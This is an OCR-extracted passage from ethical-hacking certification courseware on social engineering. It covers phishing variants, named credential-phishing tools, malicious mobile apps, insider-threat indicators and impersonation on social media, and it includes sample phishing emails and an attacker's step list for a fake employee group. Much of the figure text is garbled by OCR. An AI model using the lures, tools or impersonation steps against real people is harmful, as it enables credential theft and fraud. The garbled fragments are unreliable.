Help © Tell me what you want to do Be fe 1 B1& Boeing | ioe fi] El| BS Reply Reply Fomvard Ey ore» nk Delete Archive | Assign Mark Categorize Follow | Report
rs
Respond
Developer
Tamers
| Rinne
Delete
Poly” Unved
Tags
=
Up™ | Phishing il Cofense
Safety Account Information
Microsoft Account
teow | © tepyat | > foward | [+]
Te, @redated@insurance
Te 0/22/2022
Security info update Dear User,
‘Your email account has to be updated to avoid deactivation or Risk of theft. So we strongly recommend that you should immediately verify your
email account.
CLICK TO VERIFY
WARNING! Protect your privacy. Log-out when you are done and completely exit your browse. Privacy | Legal Figure 9.5: Screenshot showing a phishing email
Module 09 Page 1355
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Bom BE ES a
Exam 312-50 Certified Ethical Hacker
&
BM) |S e |or cam
semeLoan: 9820040018 -Secure: Pre CD / ALTA / Wire Inst and Other Closing Docs Attached
com’ Fomers
com>
New iliniisme: Secure email message from imal lillie
Open Message ‘To view the secure message, click Open Message. ‘The secure message expires on Sep 30, 2022 @ 04:01 PM (GMT). Do not reply to this notification message; this message was auto-generated by the sender's security system. To reply to the sender, click Open Message. If clicking Open Message does not work, copy and paste the link below into your Intemet browser address bar. ‘com.br/ed/Portal nttosif Want to send and receive your secure messages transparently? Click here to learn more. Be aware! Online banking fraud is on the rise. If you receive an email containing WIRE INSTRUCTIONS call your Escrow Officer immediately to verify the information prior to sending funds.
. Le
SF siesoe |!
Weatherford7 Drive, omce Mabie: Fax:
Suite 100
Email: [email protected] Department of insurance: Escrow License
CALL BEFORE YOU WIRE
Figure 9.6: Screenshot showing a phishing email
Types of Phishing =
Spear Phishing
Instead of sending out thousands of emails, some attackers opt for “spear phishing” and use specialized social engineering content directed at a specific employee or small group of employees in an organization to steal sensitive data such as financial information and trade secrets. Module 09 Page 1356
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Spear phishing messages seem to come from a trusted source with an official-looking website. The email also appears to be from an individual from the recipient's company, generally someone in a position of authority. In reality, the message is sent by an attacker attempting to obtain critical information about a specific recipient and their organization, such as login credentials, credit card details, bank account numbers, passwords, confidential documents, financial information, and trade secrets. Spear phishing generates a higher response rate compared to a normal phishing attack, as it appears to be from a trusted company source.
=
Whaling A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information. It is a social engineering trick in which the attacker tricks the victim into revealing critical corporate and personal information (like bank account details, employee details, customer information, and credit card details), generally, through email or website spoofing. Whaling is different from a normal phishing attack; the email or website used for the attack is carefully designed, usually targeting someone in the executive leadership.
=
Pharming Pharming is a social engineering technique in which the attacker programs on a victim’s computer or server, and when the victim domain name, it automatically redirects the victim’s traffic to an website. This attack is also known as “Phishing without a Lure.” confidential information like credentials, banking details, and other to web-based services. Pharming attack can be performed Modification
in two ways:
DNS
Cache
executes malicious enters any URL or attacker-controlled The attacker steals information related
Poisoning and
Host File
DNS Cache Poisoning: o
The attacker performs DNS Cache Poisoning on the targeted DNS server.
o
The attacker modifies the IP address of the target website “www.targetwebsite.com” to that of a fake website “www.hackerwebsite.com.”
o
When the victim enters the target website’s URL in the browser's address bar, a request is sent to the DNS server to obtain the IP address of the target website.
o
The DNS server returns a fake IP address that is already modified by the attacker.
©.
Finally, the victim is redirected to the fake website.
Host File Modification: o
Anattacker sends a malicious code as an email attachment.
o
When the user clicks on the attachment, the code executes and modifies local host files on the user’s computer.
Module 09 Page 1357
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering o
When
Exam 312-50 Certified Ethical Hacker
the victim enters the target website’s
compromised host file automatically website controlled by the hacker.
URL in the browsers address
bar, the
redirects the user’s traffic to the fraudulent
Pharming attacks can also be performed using malware like Trojan horses or worms. =
Spimming SPIM (Spam over Instant Messaging) exploits Instant Messaging platforms and uses IM as a tool to spread spam. A person who generates spam over IM is called Spimmer. Spimmers generally make use of bots (an application that executes automated tasks over the network) to harvest Instant Message IDs and forward spam messages to them. SPIM messages, like email spam, generally include advertisements and malware as an attachment or embedded hyperlink. The user clicks the attachment and is redirected to a malicious website that collects financial and personal information like credentials, bank account, and credit card details.
=
Angler Phishing Angler phishing is a cyber phishing fraud in which attackers target disgruntled users or customers over social media platforms. Attackers perform this attack by creating a fake social media account impersonating the organization’s helpdesk account and connecting to the disgruntled individuals via social media posts. They may reply to individuals who raise complaints on social media or post fake service links. Users assume that they have received feedback from a trusted source and access the malicious link posted by the attackers. When victims click on the link, malicious software is installed on their system, or they are redirected to another site requesting them to provide their details. This technique further encourages attackers to gain critical information such as individuals’ biodata or account information for monetary benefits.
=
Catfishing Attack A catfishing attack is an online phishing scam in which attackers target social media platforms (Facebook, Instagram, etc.) and perform identity stealing the target profile’s identity, attackers create a fake social media masquerade as the owner of the account. Then, attackers use that communicating with other users online via chat boxes or other means personal or business relationships. Later, they perform cyberbullying or engineering attempts for monetary gain.
a person on theft. After account and account for to establish other social
Signs of Catfishing o
Avoids
direct communication:
A catfisher often
provide their contact number, avoids emergency excuses of illness or travel.
©
turning
avoids direct meetings,
on
their
webcam,
refuses to
and
makes
Maintains a single profile picture for a long duration: A catfisher maintains the same profile picture for years to falsify their age. Occasionally, attacker may download all the pictures of the victim at once and use them one by one for years to falsify their age.
Module 09 Page 1358
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
=
Exam 312-50 Certified Ethical Hacker
o
Maintains a good number of friends in their account: A catfisher maintains number of friends of the opposite gender in their account.
a good
o
Requests for Money: A catfisher often requests money while pretending to be in danger. They attempt to leverage the emotional or business-oriented attachments of users.
Deepfake Attack A deepfake attack is a type of phishing attack in which attackers create false media of a person they target using advanced technologies such as ML and Al. Attackers mimic a person who is in a senior position and create falsified media with high accuracy (face, voice, video, and movements) to avoid suspicion by the end users. Attackers perform deepfakes by gathering previously recorded audio and video samples of the target person and then cloning those clips. Deepfake phishing attacks can be performed in any form and may include ghost fraud (using an expired person’s narratives or clippings), application fraud (a stolen online account’s clippings), and synthetic identity fraud (clips with unknown identity). All these deepfake attempts are made to deceive online users into believing that they are listening to original clippings, which often request donations. Further, using these fake clippings, attackers may blackmail victims into paying a
ransom.
Signs of a Deepfake Attack o
o
Audio signs ¢
Deviation from a natural speech pattern
¢
Robotic voice toning
e
Poor audio quality
Video signs ¢
Mismatch between speech and lip movement
e
Uneven blinking or eye movements
e
Frequent color changes in skin tone
Module 09 Page 1359
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Phishing Tools ShellPhish
|
CEH
ShellPhish isa phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter,
Linkedin, etc.
BLACKEYE
&
tetp://athatscom Phishx ttps://othutscom
=D et |
Modlishka ttps://othub.com
i https:/athub.com
FE
Copyright © by
FP)
Evilginx
sectantcon Al Rights Reserved. Reproduction i
Phishing Tools Phishing tools can be used by attackers to generate fake login pages to capture usernames and passwords, send spoofed emails, and obtain the victim’s IP address and session cookies. This information can further be used by the attacker, who will use it to impersonate a legitimate user and launch further attacks on the target organization.
=
ShellPhish Source: https://github.com ShellPhish is a phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter, and LinkedIn. It also displays the victim system’s public IP address, browser information, hostname, geolocation, and other information.
Module 09 Page 1360
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Instagr be napchat Twitter Github Google
Origin Steam Yahoo Linkedin Protonmail Wordpress
potify Netflix
Gitlab Pintere: Custom Exit
Microsoft
Victim IP: User-Agent:
Waiting
Next
IP and Next
Credentials,
P
Ctrl
+ C to exit...
Figure 9.8: Screenshot showing the output of ShellPhish Module 09 Page 1361
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Some additional phishing tools are listed below:
=
BLACKEYE (https://github.com)
=
PhishX (https://github.com)
=
Modlishka (https://github.com)
=
Trape (https://github.com)
=
Evilginx (https://github.com)
Module 09 Page 1362
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Mobile-based Social Engineering: Publishing Malicious Apps and Repackaging Legitimate Apps Publishing Malicious Apps @ Attackers create malicious apps with attractive features and similar names to popular apps, and publish them in major
Repackaging Legitimate Apps
app stores
Developer creates
2 gaming uploads on appapp and store
{@ Users download these apps unknowingly and are infected
by malware that sends credentials to attackers
Qe
creates malicious mobile lation
Attacker
(2)
H
>
Malicious Gaming
ry
ef ;
stacker publishes malicious ‘mobile apps on ep store
App Store
Application
2)
User downloads and
installs the malcous mobile spltion
cE H Pood beatla
Malicious developer downloads a legitimate game
=. Store
and repeciagesitwith matware >
Qos
oo
= Developer A
3)
Uploads game tothird-party
4
app store
Legit gitimate
Developer
e
Third-Party ‘App Store Mobile-based Social Engineering: Fake Security Applications and SMiShing (SMS Phishing) Fake Security Applications Userlogs on totheir bank account; a message will appear telling the userto download an application to their phone infects PC with malware tothe attacker
‘Attacker uploads malicious application ‘on app store
User downloads application from the attacker's app store
Ey)
cE H ol
SMiShing (SMS Phishing) @ SMiShing (SMS phishing) is the act of using SMS text i " mobile other or phones cellular of system messaging
devices to lure users into instant action, such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number
Sends an SMS
Thinks it isa real message from XIM bank = ‘Tracy calls 08-7999-433,
‘Arecording asks herto provide her creditor debit card number. Tracy reveals sensitive information
Attacker’s App Store
Mobile-based Social Engineering Publishing Malicious Apps In mobile-based social engineering, the attacker performs a social engineering attack using malicious mobile apps. The attacker first creates the malicious application — such as a gaming app with attractive features — and publishes it on major application stores using the popular names. Unaware of the malicious application, a user will download it onto their mobile device, Module 09 Page 1363
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Social Engineering
believing it to be genuine. Once the application is installed, the device is infected by malware that sends the user’s credentials (usernames, passwords), contact details, and other information to the attacker.
1)
Creates malicious mobile
application seeceeseees oS
Attacker publishes malicious mobile apps on
app store @ seeeetersenens > App Store =
Malicious Gaming Application
Attacker A
User downloads and !
E App sends user
installs the malicious : mobile application :
} credentials to the attacker
Figure 9.9: Publishing malicious apps
Repackaging Legitimate Apps Sometimes malware can be hidden within legitimate apps. A legitimate developer creates legitimate gaming applications. Platform vendors create centralized marketplaces to allow mobile users to conveniently browse and install these games and apps. Usually, developers submit gaming applications to these marketplaces, making them available to thousands of mobile users. A malicious developer downloads a legitimate game, repackages it with malware, and uploads it to the third-party application store. Once a user downloads the malicious application, the malicious program installed on the user’s mobile device collects the user’s information and sends it to the attacker. Developer creates a gaming app and
e
a
aid
2
Mobile App
Store
Malicious developer downloads a legitimate game
é
Sends user credentials to the malicious developer
#1
Malicious
Developer
Uploads game to third-party app store
Legitimate Developer
e fk
End user downloads (4)
malicious gaming app
User
Third-Party App Store
Figure 9.10: Repackaging legitimate apps
Module 09 Page 1364
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Fake Security Applications Attackers may send a fake security application to perform mobile-based social engineering. In this attack, the attacker first infects the victim’s computer by sending something malicious. They then upload a malicious application to an app store. When the victim logs on to their bank account, malware in the system displays a pop-up message telling the victim that they need to download an application on their phone to receive a message from security. The victim downloads the application from the attacker's app store, believing they are downloading a genuine app. Once the user downloads the application, the attacker obtains confidential information such as bank account login credentials (username and password), whereupon a second authentication is sent by the bank to the victim via SMS. Using that information, the attacker accesses the victim’s bank account.
User logs on to their bank account; a message will appear telling the userto download an
application to their phone
Infects user
PC with malware User credentials sent
Attacker
to the attacker
= Attacker uploads
User download:
malicious application
application from th
‘on app store
attacker’s app stor
Attacker’s App Store Figure 9.11: Fake security applications
SMiShing (SMS Phishing) Sending SMS is another technique used by attackers in performing mobile-based social engineering. In SMiShing (SMS Phishing), the SMS text messaging system is used to lure users into taking instant action such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number. SMiShing messages are crafted to provoke an instant action from the victim, requiring them to divulge their personal information and account details. Consider Tracy, a software engineer working in a reputed company. She receives an SMS ostensibly from the security department of XIM Bank. It claims to be urgent, and the message says that Tracy should call the phone number listed in the SMS immediately. Worried, she calls to check on her account, believing it to be an authentic XIM Bank customer service phone
Module 09 Page 1365
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
number. A recorded message asks her to provide her credit or debit card number, as well as her password. Tracy believes it is a genuine message and shares sensitive information. Sometimes a message claims that the user has won money or has been randomly selected as a lucky winner and that they merely need to pay a nominal fee and share their email address, contact number, or other information. Thinks it is a real
Sends an SMS
>
XIM BANK
Emergency!
message from
XIM bank
Please call
08-7999.433
——f Tracy calls
08-7999-433
A recording asks her to provide
her credit or debit card
number. Tracy reveals sensitive information Figure 9.12: SMiShing (SMS Phishing)
Module 09 Page 1366
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
C/EH
LO#03: Summarize Insider Threats
Al Rights Reserved. Reproduction is Stricty Prohibited
Insider Threats/Insider Attacks ‘@ Aninsider is any employee (trusted person or people) with
access to critical assets of the organization
@ An insider attack involves using privileged access to intentionally violate rules or cause threats of any form to the organization's information or information systems |@ Such attacks are generally performed by privileged users,
disgruntled employees, terminated employees, accident-prone
employees, third parties, undertrained staff, etc.
Reasons for Insider Attacks
CE H Insider Threat Statistics
According to insider threat statistics for 2022, a majority of
companies agree that privileged users, administrators, and
| C\evel executivesare the most dangerous insider threat actors
3
80
F3
5 60
© Financial gain
2
© Theft of confidential data @ Revenge
3 40
© Becoming a future competitor
. a competitor . © Helping
© Public announcement
Top Insider Threat Actors
3 goo é
o
‘Managers
Contractors and
Consultants
Regular
Employees tts: financesantine.com
Insider Threats An insider is any employee (trusted person) who has access to the critical assets of an organization. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Insider
Module 09 Page 1367
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering attacks may cause great loss to the company. easy to launch and difficult to detect.
Exam 312-50 Certified Ethical Hacker Further, they are dangerous
because they are
Insider attacks are generally performed by: Privileged Users: Attacks may come from the most trusted employees of the company, such as managers and system administrators, who have access to the company’s confidential data and a higher probability of misusing the data, either intentionally or unintentionally. Disgruntled Employees: Attacks may come from unhappy employees or contract workers. Disgruntled employees, who intend to take revenge on the company, first acquire information and then wait for the right time to compromise the organization’s
resources.
Terminated Employees: Some employees take valuable information about the company with them when terminated. These employees access the company’s data after termination using backdoors, malware, or their old credentials if they are not disabled. Accident-Prone Employees: If an employee accidentally loses their mobile device, sends an email to incorrect recipients, or leaves a system loaded with confidential data loggedin, it can lead to unintentional data disclosure. Third Parties: Third parties, like remote employees, partners, dealers, and vendors, have access to the company’s information. However, the security of their systems is unpredictable and could be a source of information leaks.
Undertrained Staff: A trusted employee becomes an unintentional insider due to a lack of cybersecurity training. They fail to adhere to cybersecurity policies, procedures, guidelines, and best practices. Companies in which insider attacks are common include credit card companies, health-care companies, network service providers, as well as financial and exchange service providers. Reasons for Insider Attacks Financial Gain An attacker performs an insider attack mainly for financial gain. The insider sells the company’s sensitive information to its competitor, steals a colleague’s financial details for personal use, or manipulates the company’s financial records or that of its personnel.
Steal Confidential Data A competitor may inflict damage upon the target organization, steal critical information, or even put them out of business just by finding a job opening, preparing someone to get through the interview, and having that person hired by the competitor.
Module 09 Page 1368
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Revenge It only takes one disgruntled person to seek revenge, and the company is compromised. Attacks may come from unhappy employees or contract workers with negative opinions about the company. Become Future Competitor
Current employees may plan to start their own competing business and, by using the company’s confidential data, these employees may access the system to steal or alter the company’s client list. Perform Competitors Bidding
Due to corporate espionage, even the most honest and trustworthy employees can be coerced into revealing the company’s critical information through bribery or blackmail. Public Announcement
A disgruntled employee may want to make a political or social statement and so leaks or damages the company’s confidential data. Insider Threat Statistics Source: https://financesonline.com According to insider threat statistics for 2022, a majority of companies agree that privileged users, administrators, and C-level executives are the most dangerous insider threat actors with fraud and financial gains as the main motivation.
[—}
co)
Percentage of Insider Threats
°
oo
Top Insider Threat Actors
Managers
Contractors and Consultants
Regular Employees
Figure 9.13: Graph showing insider threat statistics
Module 09 Page 1369
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Types of Insider Threats
CE H
-
A disgruntled or terminated employee who steals dataor destroys
sider
the corporate network
Malicious
‘i Negligent Insider js Professional Insider
Compromised Insider
Accidental Insider
.
the company’s networks intentionally by introducing malware into
Insiders who are uneducatedon potential security threatsor who °simply bypassgeneral ‘ security procedures to meet workplace i efficiency Harmful insiders whouse their technical knowledgeto identify
weaknessesand vulnerabilities in the company’s network and sell confidential information to competitors or black market bidders
who is An insider with access to critical assets ofan organization compromised by an outside threat actor
Inadvertent exposure of data toan external entityby mistypingan email address, sendinga valuable business documentto an unknown user, or unintentionally clicking on a malicious hyperlink
Why are Insider
Attacks Effective?
@ Easy to launch @ Prevention is difficult © Succeed easily ©
Employees can easily cover
their tracks
© Differentiating harmful actions from the employee's regular work is very difficult
© Cango undetected for years and remediation is very expensive
Types of Insider Threats There are four types of insider threats. They are:
Malicious Insider Malicious insider threats come from disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware into the corporate network. Negligent Insider Insiders, who are uneducated on potential security threats or simply bypass general security procedures to meet workplace efficiency, are more vulnerable to social engineering attacks. Many insider attacks result from employee’s laxity towards security measures, policies, and practices. Professional Insider Professional insiders are the most harmful insiders. They use their technical knowledge to identify weaknesses and vulnerabilities in the company’s network and sell the organization’s confidential information to competitors or black-market bidders. Compromised Insider
An outsider compromises an insider who has access to the critical assets or computing devices of an organization. This type of threat is more difficult to detect since the outsider masquerades as a genuine insider.
Module 09 Page 1370
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering =
Exam 312-50 Certified Ethical Hacker
Accidental Insider Accidental insider threats occur from the inadvertent exposure of confidential details to an external entity. Mistyping an email address, sending a valuable business document to an unknown user, unintentionally clicking on a malicious hyperlink, downloading a virusinfected file in a phishing email, and inadvertently disposing important papers are a few examples of accidental insider threats.
Why are Insider Attacks Effective? Insider attacks are effective because: =
Insider attacks can go undetected for years, and remediation is expensive.
=
Insider attacks are easy to launch.
=
Preventing insider attacks is difficult; an inside attacker can easily succeed
=
It is very difficult to differentiate harmful actions from the employee’s regular work. It is hard to identify whether employees are performing malicious activities or not.
=
Even after malicious activity is detected, responsibility and claim it was a mistake.
=
It is easy for employees to cover their actions by editing or deleting logs to hide their malicious activities.
the
employee
may
refuse
to
accept
Example of Insider Attack: Disgruntled Employee Most cases of insider abuse can be traced to individuals who are introverts, incapable of managing stress, experiencing conflict with management, frustrated with their job or office politics, craving respect or promotion, transferred, demoted, or issued an employment
termination notice, among other reasons. Disgruntled employees may pass company secrets and intellectual property to competitors for monetary gain, thus harming the organization.
Disgruntled employees can use steganography programs to hide company secrets and later send the information to competitors as an innocuous-looking message such as a picture, image, or sound file using a work email account. No one suspects them because the attacker hides the stolen sensitive information in the picture or image file. A
TF. S
Disgruntled Employee
_—
Sends the data to competitors
. Company’s Secrets
using steganography
Company Network
>
’
a
ee
¥
Competitors
Figure 9.14: Example of Insider Attack — Disgruntled Employee
Module 09 Page 1371
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Behavioral Indications of an Insider Threat
if EH
fa | Data exfiltration alerts
oi
Unauthorized downloading or copying of sensitive data
Ei
missing or modified network logs
EBD
bozeing of different user accounts from different systems
EB
changesin network usage patterns
FEI temporatchanges in revenue or expenditure
Eh
muttipte faited iogin attempts
FER unauthorized access to physical assets
EE
behavioral and temperament changes
EEG increaseor decreasein productivity of employee
EE
vnusuai time and location of access
EE
Ei
missingor modified critical data
EEA unusual business activities
inconsistent workinghours
served. Reproduction
Behavioral Indications of an Insider Threat Indicators of insider threats are generally abnormal user activities that deviate from regular work activities. These represent unusual patterns of user behavior that require further analysis to identify malicious motives and intents. The most common indicator of insider threat is a lack of employee awareness about security measures. The following are various behavioral indicators of insider threats: =
Alerts of Data Exfiltration Alerts of the unauthorized gathering and transmission of data on the network can represent an insider or malware attack. Insiders can also use paper, fax machines, hard drives, portable devices, and other computing equipment to gather and transfer sensitive data.
=
Missing or Modified Network Logs Insiders try to access the log files to delete, modify, and edit unauthorized access events, file transfer logs, and other records from systems and network devices to avoid detection. Alerts of log modification, deletion, or access can indicate attacks.
=
Changes in Network Usage Patterns Changes in the network patterns of the network-specific protocols, size of the packets, sources and destinations, frequency of user application sessions, and bandwidth usage can indicate malicious activity.
Module 09 Page 1372
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering =
Exam 312-50 Certified Ethical Hacker
Multiple Failed Login Attempts The insider can try to log in to unauthorized systems or applications by brute-force. So, multiple failed attempts may indicate an insider threat.
=
Behavioral and Temporal Changes Deviation from established behavior and temporal changes in employee behavior such as spending capacity, frequent travel, anger management issues, constant quarrels with colleagues, and lethargy in performing work are some of the fraud indicators.
=
Unusual Time and Location of Access Any mismatch in the timeline of an event can be suspicious and may indicate an insider threat. For example, if activities are logged on employee systems in their absence.
=
Missing or Modified Critical Data Disgruntled employees can modify or delete sensitive data to damage the reputation of the organization.
=
Unauthorized Download or Copying of Sensitive Data Insiders use legitimate and malicious tools to extract data from the organization’s perimeter. Insiders can install malware, trojans, and backdoors to steal information.
=
Sending Sensitive Information to Personal Email Account Insiders may send critical organizational information to their personal email accounts with malicious intent.
=
Logging of Different User Accounts from Different Systems Unusual times of access combined with a change in the IP address of the system used to log into the account may represent malicious activities.
=
Temporal Changes in Revenue or Expenditure Unexpected and unexplained changes in the financial status of an employee signify an income generated from external sources. The organization should audit their financial reports to identify whether the employee was involved in any malicious activities.
=
Unauthorized Access to Physical Assets Activities such as employees using authorized assets without authentication, trying to escalate their privileges beyond their job requirements, or trying to gain physical access to the assets can represent a threat.
=
Increase or Decrease in Productivity of Employee Employees who are unproductive, threatening, have legitimate or illegitimate job concerns, and disagree with intellectual property rights tend to be suspicious. A sudden increase or decrease in their productivity can signify suspicious behavior.
Module 09 Page 1373
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering =
Exam 312-50 Certified Ethical Hacker
Inconsistent Working Hours, Unusual Business Activities, and Concealed or Frequent Foreign Trips Employees with suspicious business activities like unusual login times, unusual office hours, unauthorized browsing and downloads, concealed trips abroad, and meetings with representatives from other countries or organizations may pose a threat to the organization.
=
Extreme Behavior Due to Mental Instability Some employees possess unpredictable and extreme behavior, such as kleptomania, and a sudden change in behavior may be due to mental instability. This raises the probability that they will perform financial fraud, data theft, or physical theft.
=
Signs of vulnerability (Such as Drug or Alcohol Abuse, Financial Difficulties, Gambling, Illegal Activities) Employees with bad habits such as drugs, gambling, and alcohol abuse, and relationship issues, may take a chance to breach the organization’s data for money. Organizations must regularly monitor the activities of such employees.
=
Complaint on Sensitive Data Leak Information or complaints regarding sensitive data leaks can represent an insider attack. Check for customer reviews and concerns to identify anomalies and analyze them to identify the insider.
=
Abnormal Access of Systems and User Accounts The mismatch between the systems assigned systems may indicate an insider threat.
=
and
used to access the
Irresponsible Social Media Behavior Insiders may attempt to create a negative impact unnecessary information on social media websites.
=
user accounts
on
the
organization
by
posting
Attempt to Access Restricted Zones Employees with malicious intent may try to access restricted areas of the organization to collect sensitive information.
Module 09 Page 1374
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
CEH
LO#04: Explain Impersonation on Social Networking Sites
Impersonation on Social Networking Sites Today social networking sites are widely used by many people that allow them to build online profiles, share information and media such as pictures, blog entries, and music clips. Thus, it is relatively easier for an attacker to impersonate someone. The victim is likely to trust the attacker and eventually reveal information that would help them gain access to the system. This section describes how attackers perform social engineering through impersonation using various social networking sites such as Facebook, LinkedIn, and Twitter, and highlights the risks these sites pose to corporate networks.
Module 09 Page 1375
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Social Engineering through Impersonation on Social Networking Sites
cE H |
@ Malicious users gather confidential information from social networkingsites and create accounts using another person’s name ‘@ Attackers use these fraudulent profilesto create large
Organization Details
Professional Details Contacts and Connections
Personal Details
rv|:3]
networksof friendsand extract information using social
engineeringtechniques 8 igtecnniq Attackers
attempt to join the target
organization’s employee prtos B e t Org: ons isshared employ groups where personal and company information
@ Attackers may can also use collected information to carry out other forms of social engineering attacks
Social Engineering through Impersonation on Social Networking Sites As social networking sites such as Facebook, Twitter, and Linkedin are widely used, attackers coopt them as a vehicle for impersonation. There are two ways an attacker can perform impersonation on social networking sites:
=
By creating a fictitious profile of the victim on the social media site
=
By stealing the victim’s password or indirectly gaining access to the victim’s social media
account
Social networking sites are a treasure trove for attackers because people share their personal and professional information on these sites, such as name, address, mobile number, date of birth, project details, job designation, company name, and location. The more information people share on a social networking site, the more likely it is that an attacker can impersonate them to launch attacks against them, their associates, or their organization. They may also try to join the target organization’s employee groups to extract corporate data.
In general, the information attackers gather from social networking sites includes organization details, professional details, contacts and connections, and personal details, which they then use to execute other forms of social engineering attacks.
Module 09 Page 1376
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Impersonation on Facebook
CE H
@ Theattacker creates a fake user group on Facebook labeled as for “Employees of” the target company @ Usinga false identity,the attacker then proceeds to "friend" or invite employees tothe fake group @ Users join the group and provide their credentials such as date of birth, educationaland employment backgrounds, spouses’ names, etc.
‘
Christopher Nolan
| Usingthe details of any of these employees,the attackercan compromisea secured facility to gain accessto the building | Attackers scan detailsin profile pages. They use these for spear phishing, impersonation, and identity theft Copyright © by
Tita ur facebook com Al Rights Reserved. Reproduction i
Impersonation on Facebook Source: https://www.facebook.com Facebook is a well-known between friends who share users on Facebook, attackers fake accounts and try to add information.
social networking site that connects people. It is comments and upload photos, links, and videos. To use nicknames or aliases instead of their real names. “Friends” to view others’ profiles and obtain critical
widely used impersonate They create and valuable
The steps an attacker takes to lure a victim into revealing sensitive information: =
Create a fake user group on Facebook identified as "Employees of" the target company
=
Using a false identity, proceed to "friend," or invite actual employees to the fake group, “Employees of Company XYZ”
=
Users join the group and provide their credentials such as date of birth, educational and employment backgrounds, or spouses’ names.
=
Using the details of any one of the employees, an attacker can compromise a secured facility to gain access to the building
Attackers create a fake account and scan the details on the profile pages of various targets on social networking sites such as Linkedin and Twitter to engage in spear phishing, impersonation, and identity theft.
Module 09 Page 1377
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
7ii
NX About
Create post
peopl ie this indting 4 of your eds
‘tvistopher Nolan th Ashraf am or 15 others ee
Figure 9.15: Screenshot showing Facebook profile
Module 09 Page 1378
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
.
Exam 312-50 Certified Ethical Hacker
:
Social Networking
B
Data
Threats to Corporate
Theft
Networks
C iE H
Modification of Content
Involuntary Data Leakage
Ell
|
Malware Propagation
Targeted Attacks
18 |
Damage to Business Reputation
Network Vulnerability
9]
Infrastructure and Maintenance
Spam and Phishing
10]
Loss of Productivity
Copyright © by
Social Networking Threats to Corporate Networks Before sharing data on a social networking site, or enhancing their channels, groups, or profiles, private and corporate users should be aware of the following social or technical security risks: Data Theft: Social networking sites are huge databases worldwide, increasing the risk of information exploitation.
accessed
by
many
people
